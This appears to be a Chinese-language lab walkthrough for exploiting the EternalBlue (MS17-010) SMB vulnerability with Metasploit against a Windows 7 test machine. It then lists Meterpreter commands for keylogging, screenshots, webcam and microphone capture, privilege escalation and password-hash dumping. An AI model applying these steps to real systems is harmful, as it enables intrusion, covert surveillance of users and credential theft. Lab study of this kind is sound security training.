ms17-010漏洞利用
漏洞描述
- 永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
- Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
实验环境
主机:kali IP:192.168.220.128
靶机:windows7 IP:192.168.220.130
漏洞利用
- 查看靶机能否ping通
- 进入matesploit
- 搜索ms17-010
- 使用攻击模块
- 设置攻击载荷payload
- 查看需要配置的参数
Required项是yes的都是需要配置的
RHOST是靶机IP,RHOSTS表示可以输入多个IP地址
LHOST是主机IP
LPORT是主机的攻击端口
- 设置相关参数
- 开始攻击exploit
- 攻击成功,meterpreter有很多命令,输入help查看
用户操作:Stdapi: User interface Commands(用户接口命令)
enumdesktops -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop -->得到当前的Meterpreter桌面
idletime -->返回秒远程用户已经闲置数量
keyscan_dump -->转储按键缓冲(下载键盘记录)
keyscan_start -->开始捕获击键(开始键盘记录)
keyscan_stop -->停止捕获击键(停止键盘记录)
screenshot -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop -->改变meterpreters当前桌面
uictl -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)
PS:键盘记录注意点,先开始,后下载,再结束,否则会出错
摄像头:Stdapi: Webcam Commands(摄像头命令)
record_mic -->X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat -->开始视频聊天(视频,对方会有弹窗)
webcam_list -->单摄像头(查看摄像头列表)
webcam_snap -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream -->播放视频流从指定的摄像头(开启摄像头监控)
其他命令操作
getsystem -->获取高权限
hashdump -->获取当前用户hash